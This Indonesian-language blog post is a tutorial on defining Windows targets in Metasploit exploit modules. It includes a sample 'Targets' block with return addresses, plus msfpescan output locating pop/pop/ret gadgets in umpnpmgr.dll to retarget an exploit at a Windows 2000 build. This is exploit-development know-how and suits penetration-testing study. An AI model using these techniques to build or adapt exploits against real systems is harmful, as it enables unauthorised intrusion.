Posts Subscribe comment Comments

Tips Menentukan Berbagai Target Windows dengan Metasploit (cm115)

Mendefinisikan daftar target (nama, nomor, dan option).
Target harus dispesifikasikan dengan nomor ketika di lauching

'Targets' =>
          [
                 # Windows 2000 – TARGET = 0
                 [
                      'Windows 2000 English',
                      {
                           'Rets' => [ 0x773242e0 ],                                         
                      },
                 ],
                 # Windows XP - TARGET = 1
                 [
                      'Windows XP English',
                      {
                           'Rets' => [ 0x7449bf1a ],
                      },
                 ],            
          ],
'DefaultTarget' => 0))


Block Target Option
ini disimbolkan dengan spesial name :
- Ret kependekan dari target.ret()
- 'Payload' overload exploit
Option, contoh:
- kembalian address Windows 2000
- 500 bytes untuk target Windows XP
- Windows Vista NX untuk bypass addressnya

Informasi Target
memasuki target menggunakan hash :
- target['padcount']
- target['Rets'][0]
- target['Payload']['BadChars']
- target['opnum']

Menambah dan Memfixkan target Exploit
contoh target kita adalah Windows 2000
untuk membuat address exploitnya adalah dengan menemukan file umpnpmgr.dll
ditabel terlihat :
'Windows 2000 SP0-SP4',
{
          'Ret'          => 0x767a38f6,  # umpnpmgr.dll
}

Nah dengan acuan itu kita akan membuat exploit numbernya
root@bt4:/pentest/exploits/framework3# ./msfpescan -D -a 0x767a38f6 win2000sp4.umpnpmgr.dll
[win200sp4.umpnpmgr.dll]
0x767a38f6 5f5ec3558bec6aff68003c7a7668e427
00000000 5F                pop edi
00000001 5E                pop esi
00000002 C3                ret
00000003 55                push ebp
00000004 8BEC              mov ebp,esp
00000006 6AFF              push byte -0x1
00000008 68003C7A76        push 0x767a3c00
0000000D 68                db 0x68
0000000E E427              in al,0x27

kemudian kita menggunakan mesin msfpescan :
root@bt4:/pentest/exploits/framework3# ./msfpescan -p targetos.umpnpmgr.dll
[targetos.umpnpmgr.dll]
0x79001567 pop eax; pop esi; ret
0x79011e0b pop eax; pop esi; retn 0x0008
0x79012749 pop esi; pop ebp; retn 0x0010
0x7901285c pop edi; pop esi; retn 0x0004

Nah kita sudah menemukan nomor target
'Windows 2000 SP0-SP4 Russian Language',
{
          'Ret'          => 0x7901285c,  # umpnpmgr.dll
}

0

Silahkan Tulis Komentar Anda ...